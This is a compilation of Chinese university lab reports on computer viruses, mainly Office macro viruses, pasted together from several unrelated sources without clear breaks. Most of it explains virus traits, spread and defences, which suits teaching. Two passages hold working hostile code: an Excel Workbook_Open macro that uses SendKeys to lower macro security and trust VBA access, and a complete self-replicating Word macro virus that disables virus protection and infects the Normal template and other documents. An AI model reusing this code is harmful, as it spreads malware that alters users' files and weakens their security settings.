东华大学计算机病毒课实验六宏病毒实验报告.pptx

---------------------------------------------------------------最新资料推荐------------------------------------------------------宏病毒分析实验(新)宏病毒分析实验一、实验目的及要求：通过本实验的学习，大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。

二、实验基本原理：宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。

宏病毒的前缀是：Macro，第二前缀是：Word、 Word97、 Excel、 Excel97（也许还有别的）其中之一。

凡是只感染 WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀，格式是：Macro. Word97；凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀，格式是：Macro. Word；凡是只感染 EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀，格式是：Macro. Excel97；凡是只感染 EXCEL97 以后版本 EXCEL 文档的病毒采用 Excel做为第二前缀，格式是：Macro. Excel，依此类推。

该类病毒的公有特性是能感染 OFFICE系列文档，然后通过OFFICE 通用模板进行传播，如：1 / 5著名的美丽莎(Macro. Melissa) 。

一个宏的运行, 特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高, 那么, 没有签署的宏就不能运行了, 甚至, 还能使部分 Excel 的功能失效.所以, 宏病毒在感染 Excel 之前, 会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低. Application. SendKeys%TMSs%L{RETURN} 仅修改这个还不行, 很多宏会涉及到 VisualBasic, 所以, 宏的安全性还要信任对于VisualBasic 项目的访问, 所以, 综合安全级别的修改, 就为 Application. SendKeys%TMSs%LT%v{RETURN} 如何判断信任还是不信任对于VisualBasic 项目的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ‘ 其它功能的程序段ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} 本段程序的功能为: 一旦宏无法正常就进行宏的安全性的修改和对信任对于VisualBasic 项目的访问的修改, 从而这宏病毒的正常运行提供系统支持. 本程序应放在 VBA 中的 ThisWorkbook PrivateSubWorkbook_Open() EndSub 这样一旦打开工作薄就会对其进行有效的修改. 完整的程序为: PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub ‘ 其它功能的程序段 ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} EndSub 三、主要仪器设备及实验耗材：PC 电脑一台四、实验内容或步骤：---------------------------------------------------------------最新资料推荐------------------------------------------------------ 1．启动 Word，创建一个新文档。

计算机病毒实验报告计算机病毒实验报告引言：计算机病毒是一种恶意软件，可以对计算机系统造成破坏和损失。

为了更好地了解计算机病毒的特点和对计算机系统的影响，我们进行了一系列的实验。

本报告将详细介绍我们的实验过程、结果和结论。

实验一：病毒传播方式我们首先研究了计算机病毒的传播方式。

通过在一个封闭的网络环境中模拟实验，我们发现计算机病毒主要通过电子邮件、可移动存储设备和互联网下载等方式进行传播。

这些传播方式都依赖于用户的不慎操作或者系统的漏洞。

实验二：病毒对系统性能的影响我们接着研究了计算机病毒对系统性能的影响。

在一个实验环境中，我们分别在未感染和感染病毒的计算机上进行了性能测试。

结果显示，感染病毒的计算机在运行速度、响应时间和网络连接方面都明显下降。

这是因为计算机病毒会占用系统资源、干扰正常的进程和网络通信。

实验三：病毒防护措施为了更好地保护计算机系统免受病毒攻击，我们进行了一系列的病毒防护措施实验。

我们测试了不同的杀毒软件和防火墙，并对其进行了性能和效果的评估。

结果显示，合适的杀毒软件和防火墙可以有效地检测和阻止病毒的传播，保护计算机系统的安全。

实验四：病毒对个人隐私的威胁除了对系统性能的影响，计算机病毒还可能对个人隐私造成威胁。

我们进行了一项实验，模拟了一个病毒窃取个人信息的场景。

通过在一台计算机中安装了一个窃取密码的病毒，我们发现该病毒能够成功获取用户的登录信息和敏感数据。

这个实验结果提醒我们，保护个人隐私是非常重要的，我们应该谨慎对待未知来源的文件和链接。

结论：通过一系列的实验，我们对计算机病毒有了更深入的了解。

计算机病毒的传播方式多种多样，主要依赖于用户的不慎操作和系统的漏洞。

感染病毒会导致计算机系统性能下降，并可能对个人隐私造成威胁。

为了保护计算机系统的安全，我们应该采取合适的病毒防护措施，如安装杀毒软件和防火墙，并且要时刻保持警惕，不轻易打开未知来源的文件和链接。

总结：计算机病毒是现代计算机系统中的一大威胁，对系统性能和个人隐私都有着巨大的影响。

宏病毒分析报告一、引言在当今数字化的工作环境中，宏病毒已成为一种常见的计算机安全威胁。

宏病毒通常隐藏在文档、电子表格等文件中的宏代码中，一旦被激活，可能会对用户的计算机系统和数据造成严重损害。

本报告旨在对宏病毒进行详细的分析，包括其定义、特点、传播方式、危害以及防范措施等方面，以帮助用户更好地了解和应对这一威胁。

二、宏病毒的定义与特点（一）定义宏病毒是一种利用应用程序（如 Microsoft Office）中的宏语言编写的恶意代码。

宏是一系列预定义的操作指令，可以自动执行重复性任务，但也被恶意攻击者利用来传播病毒。

（二）特点1、隐蔽性强宏病毒通常隐藏在看似正常的文档中，用户很难察觉。

2、传播速度快通过电子邮件、网络共享等方式，能够迅速传播到大量计算机。

3、变种多样由于宏语言的灵活性，宏病毒容易产生变种，增加了查杀的难度。

三、宏病毒的传播方式（一）电子邮件附件攻击者将包含宏病毒的文档作为电子邮件附件发送给用户，当用户打开附件并启用宏功能时，病毒就会被激活。

（二）网络共享文件在共享网络中，用户可能会下载或打开被感染的文件，从而感染宏病毒。

（三）恶意网站用户访问恶意网站时，可能会被诱骗下载包含宏病毒的文件。

四、宏病毒的危害（一）破坏数据宏病毒可能会删除、篡改或加密用户的重要文件和数据，导致数据丢失或无法使用。

（二）系统崩溃大量的恶意操作可能导致计算机系统崩溃，影响正常的工作和学习。

（三）窃取信息某些宏病毒还能够窃取用户的个人信息、账号密码等敏感数据，造成隐私泄露和财产损失。

五、宏病毒的检测与分析方法（一）杀毒软件检测使用知名的杀毒软件对计算机进行全面扫描，能够检测出大部分已知的宏病毒。

（二）文件特征分析通过分析文件的大小、修改时间、宏代码等特征，判断是否存在异常。

（三）行为监测观察文件在运行时的行为，如是否自动连接网络、访问敏感区域等，来判断是否感染宏病毒。

六、宏病毒的防范措施（一）提高安全意识用户应了解宏病毒的危害，不随意打开来源不明的文件和邮件附件。

南京航空航天大学计算机病毒及防治上机实验报告学院：理学院专业：信息与计算科学学号：081310128姓名：王晨雨授课老师：薛明富二〇一六年十二月目录实验一：引导型病毒实验 (2)实验二：Com病毒实验 (6)实验三：PE文件格式实验 (9)实验四：32位文件型病毒实验 (11)实验五：简单的木马实验 (14)实验七：木马病毒清除实验（选做） (19)实验八：Word宏病毒实验（一） (22)实验九：Word宏病毒实验（二） (27)实验十：Linux脚本病毒实验（选做） (32)实验十二：基于U盘传播的蠕虫病毒实验 (33)实验十三：邮件型病毒实验 (36)实验十四：Web恶意代码实验 (39)实验一：引导型病毒实验【实验目的】通过实验，了解引导区病毒的感染对象和感染特征，重点学习引导病毒的感染机制和恢复感染病毒文件的方法，提高汇编语言的使用能力。

实验内容引导阶段病毒由软盘感染硬盘实验。

通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制：阅读和分析病毒的代码。

DOS运行时病毒由硬盘感染软盘的实现。

通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制：阅读和分析病毒的代码。

【实验平台】VMWare Workstation 12 PROMS-DOS 7.10【试验内容】第一步：环境安装安装虚拟机VMWare，在虚拟机环境内安装MS-DOS 7.10环境。

第二步：软盘感染硬盘1)运行虚拟机，检查目前虚拟硬盘是否含有病毒，图1表示没有病毒正常启动硬盘的状态。

2)在附书资源中复制含有病毒的虚拟软盘virus.img3)将含有病毒的软盘插入虚拟机引导，可以看到闪动的字符*^_^*，如图2所示，按任意键进入图3。

第三步：验证硬盘已经被感染1)取出虚拟软盘，通过硬盘引导，再次出现了病毒的画面如图4。

2)按任意键后正常引导了DOS系统如图5。

可见，硬盘已被感染。

第四步：硬盘感染软盘1)下载empty.img，并且将它插入虚拟机，启动计算机，由于该盘为空，如图6.2)取出虚拟软盘，从硬盘启动，通过命令format A:/q快速格式化软盘。

计算机病毒的实验报告计算机病毒的实验报告摘要：计算机病毒是一种具有破坏性的恶意软件，能够感染计算机系统并对其进行破坏。

本实验通过模拟计算机病毒的传播过程，探究病毒的特性和防范措施。

实验结果表明，计算机病毒具有隐蔽性、传播性和破坏性，而防病毒软件和用户的安全意识是有效防范计算机病毒的重要手段。

引言：随着计算机技术的不断发展，计算机病毒作为一种具有破坏性的恶意软件，给计算机系统的安全带来了巨大威胁。

为了深入了解计算机病毒的特性和传播方式，本实验模拟了计算机病毒的传播过程，并对病毒的特性进行了研究。

实验方法：1. 实验环境：使用一台具备网络连接功能的计算机作为实验主机。

2. 实验过程：在实验主机上安装一个模拟计算机病毒的程序，并设置病毒传播路径。

3. 实验观察：观察计算机病毒在实验主机上的传播情况，记录病毒感染的时间和影响范围。

4. 实验分析：分析计算机病毒的传播速度、感染方式和破坏程度。

实验结果：通过实验观察和数据记录，我们得到了以下实验结果：1. 计算机病毒的传播速度较快：在实验主机上设置病毒传播路径后，病毒很快感染了整个计算机系统，包括操作系统和应用程序。

2. 计算机病毒具有隐蔽性：病毒在感染过程中能够隐藏自身，不易被用户察觉。

这使得病毒能够长时间存在于计算机系统中，对系统进行潜在的破坏。

3. 计算机病毒的传播方式多样：病毒可以通过网络传播，如电子邮件、恶意链接等；也可以通过可移动存储介质传播，如U盘、移动硬盘等。

这些传播方式使得病毒能够迅速传播到其他计算机系统，形成病毒的流行。

4. 计算机病毒的破坏程度较大：病毒在感染计算机系统后，可以破坏文件、删除重要数据、篡改系统设置等，给用户带来严重的损失。

实验讨论：通过以上实验结果，我们可以得出以下结论：1. 防病毒软件是有效防范计算机病毒的重要手段。

及时更新病毒库、进行定期扫描和实时监测，可以有效阻止病毒的感染和传播。

2. 用户的安全意识也是防范计算机病毒的重要因素。

宏病毒实验报告一、实验目的本次实验旨在深入了解宏病毒的工作原理、传播方式以及其对计算机系统可能造成的危害，并通过实际操作和观察，探索有效的防范和清除策略。

二、实验环境1、操作系统：Windows 10 专业版2、办公软件：Microsoft Office 20193、杀毒软件：＿____杀毒软件三、实验原理宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

当打开包含宏病毒的文档时，宏病毒会被自动激活，并执行其中的恶意代码。

宏病毒通常利用 Office 软件中的宏功能来实现自我复制、传播和破坏操作。

四、实验步骤1、准备带有宏病毒的测试文档从网络上获取已知的含有宏病毒的示例文档。

对获取的文档进行备份，以防对实验环境造成不可恢复的破坏。

2、观察宏病毒的激活过程打开带有宏病毒的文档。

留意弹出的警告提示，记录相关信息。

3、分析宏病毒的行为观察文档中的内容是否被篡改。

检查计算机系统的性能是否受到影响，如 CPU 使用率、内存占用等。

4、尝试清除宏病毒使用安装的杀毒软件进行扫描和清除。

手动删除相关的宏代码。

五、实验结果与分析1、宏病毒激活情况打开测试文档时，Office 软件弹出了宏安全警告，但仍可以选择启用宏。

一旦启用宏，病毒立即开始执行恶意操作。

2、宏病毒的行为表现文档中的部分文本被修改，格式变得混乱。

CPU 使用率短时间内飙升，系统运行变得卡顿。

3、清除效果杀毒软件能够检测到宏病毒，并成功清除大部分感染，但仍有部分残留。

手动删除宏代码后，文档恢复正常，系统性能也逐渐恢复。

六、实验结论1、宏病毒具有较强的隐蔽性和破坏性，能够在用户不知情的情况下对文档和系统造成损害。

2、办公软件的宏安全设置对于防范宏病毒至关重要，用户应保持较高的安全意识，不轻易启用来源不明的宏。

3、杀毒软件在宏病毒的清除方面起到了一定的作用，但仍需不断更新病毒库和优化清除算法，以应对不断变化的宏病毒威胁。

4、定期备份重要的文档和数据是防范宏病毒造成严重损失的有效措施。

计算机病毒实验报告1. 实验目的通过本次实验，我们的目的是了解计算机病毒的基本概念、特征及分类，掌握常用的杀毒软件的使用方法，并了解病毒对计算机的影响，从而增强对计算机安全的认识。

2. 实验环境本次实验我们使用的计算机环境为Windows 10操作系统，实验所用的杀毒软件为360安全卫士。

3. 实验过程3.1 计算机病毒的概念计算机病毒是指那些在计算机系统中侵入并产生破坏、破坏、传播等行为的程序和代码。

计算机病毒可分为多种类型，包括文件病毒、网络病毒、驱动器病毒等。

3.2 计算机病毒的特征计算机病毒有以下几种特征：•潜伏性：病毒在计算机系统中往往不会马上制造破坏，而是先潜伏一段时间，等待某些条件的满足后再进行攻击；•传染性：计算机病毒通过文件、网络等方式进行传播，有蔓延性；•破坏性：计算机病毒会对系统、软件或数据等进行破坏；•隐匿性：很多病毒会将自己隐藏在计算机系统的某些位置，难以被发现；•多样性：计算机病毒可以通过不断变化自身的形态等方式来规避杀软的检测。

3.3 计算机病毒的分类根据病毒的传播方式和感染对象，计算机病毒可以分为多种类型，包括文件病毒、网络病毒、木马病毒、蠕虫病毒等。

3.4 常用的杀毒软件在本次实验中，我们使用了360安全卫士这一国内常用的杀毒软件。

该软件不仅可以实现基本的病毒查杀功能，还可以对各种病毒进行拦截和清除。

3.5 实验结果通过本次实验，我们成功地了解了计算机病毒的基本概念、特征及分类，掌握了常用的杀毒软件的使用方法，并对病毒对计算机的影响有了一定的认识。

4. 实验结论计算机病毒是一种具有传染性、破坏性、隐匿性等特征的程序，对计算机系统和数据安全构成威胁。

通过学习本次实验，我们可以提高对计算机安全的认识，掌握常用的杀毒软件的使用方法，并加强对计算机安全的保护。

宏病毒实验报告201424010257 邹文敏一、实验目的通过运行计算机代码，更加深刻的理解计算机代码。

对计算机代码有一个初步的认识。

加深对宏病毒的感性认识，宏病毒是感染数据文件word,office等。

二、实验内容运行自我复制，感染word公用模板和当前文档；具有一定破坏性的宏；清除宏病毒。

三、实验步骤实验一：●将word文档中的开发者工具打开；word 中心→信任选项→宏设计将信任选项打开●运行第一个实验Visual Basic →normal →Microsoft→the documentProject→microsoft word对象→the document复制如下代码：'APMPPrivate Sub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.VirusProtection = FalseOptions.SaveNormalPrompt = False '以上都是基本的自我隐藏措施MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then _Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule With HostIf .Lines(1, 1) <> "'APMP" Then '判断感染标志.DeleteLines 1, .CountOfLines '删除目标文件所有代码.InsertLines 1, MyCode '向目标文档写入病毒代码If ThisDocument = NormalTemplate Then _ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd WithMsgBox "Basic class macro by jackie", vbOKOnly, "APMP"End Sub保存时注意保存为宏文件实验一运行截图：清除实验一中的内容只需要删除，the document 中的内容在保存即可。

计算机病毒实验报告实验3.2 台湾No.1宏病毒3.2 台湾No.1宏病毒3.2.1 实验目的了解台湾No.1宏病毒的基本概念实验自己的台湾No.1宏病毒3.2.2 实验原理台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏，其代码主要是造成恶作剧，并且有可能使用户计算机因为使用资源枯竭而瘫痪。

3.2.3 实验预备知识点】什么是Word宏对VBA语言有一定的了解3.2.4 实验环境操作系统：WINDOWS2000JDK版本：Java Standard Edition 1.4.0以上数据库：MysqlWeb服务器:TomacatOffice版本:MS office2000/20033.2.5 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界，输入用户名和密码。

（注意：实验前先关闭所有杀毒软件。

）1.病毒感染实验由于该病毒特征码明显，因此请首先将病毒防火墙关闭，将系统时间调整到13日。

进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒感染实验”，要根据要求和提示操作配置客户端的邮件地址，如下图3-2-1所示。

根据提示下载提供的台湾No.1病毒，亲自运行并记录自己的实验报告。

图3-2-1 病毒样本下载页面2.病毒代码分析进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“病毒代码分析”，可以分析页面中的台湾No.1病毒源代码，根据相关代码分析，填写页面中空白的参数，点击确定系统将自动生成代码。

新建一个word文档作为自己编写的该病毒文件，然后把生成的代码复制并粘帖至Word自带的VBA编译工具中，可以参照美丽莎宏病毒实验中的图4-3至4-4 。

将自行编制的病毒备份待用。

3.杀毒实验进入病毒防护教学实验后，点击左侧的“台湾N0.1宏病毒”，然后在点击下面的“杀毒实验”，学习病毒防范方法，根据系统页面上的提示，使用手动杀毒，并写入实验报告中。

宏与宏病毒实验1.宏病毒介绍宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果 WORD系统中的模板包含了宏病毒，我们称WORD系统感染了宏病毒。

所谓宏是将一系列word命令和指令组合起来，形成一个命令，实现任务执行的自动化。

在word中有一类很实用的自动宏，会在特定事件发生时自动运行，word提供的5个自动宏是：(1) Autoexec宏在启动word时自动运行；(2) Autoexit宏在退出word时自动运行；(3) Autonew宏在新建文档时自动运行；(4) Autoopen宏在打开文档时自动运行；(5) Autoclose宏在关闭文档时自动运行；2.实验环境实验环境：windows2000及以上或windows XP所需软件：office word3.实验步骤(1)首先，依次选择“工具”-“宏”-“录制宏”菜单命令，接着弹出“录制宏”界面，如下图：接着在“宏名”下面的输入框中输入新宏的名称“yuan ”，接着单击“键盘”图标。

在弹出的“自定义键盘”界面中指定快捷键，比如ctrl+y ，单击左下角“指定”按钮后，再单击右下角的“关闭”按钮，回到”录制宏“界面。

这时单击”确定“按钮启动记录器。

接着，依次选择“插入“-”符号“菜单命令，弹出”符号“界面。

选择”符号“选项卡，在”符号“框中选择”￥“，单击”插入“按钮后再单击”关闭“按钮。

单击“停止录制“工具栏中的”停止录制“按钮。

以后，当需要插入字符“￥”的时候，只需要按下ctrl+y组合键。

(2) 给word文档加上通用的密码关闭word文档，当再次打开文档的时候，需要输入密码才能看到内容和修改。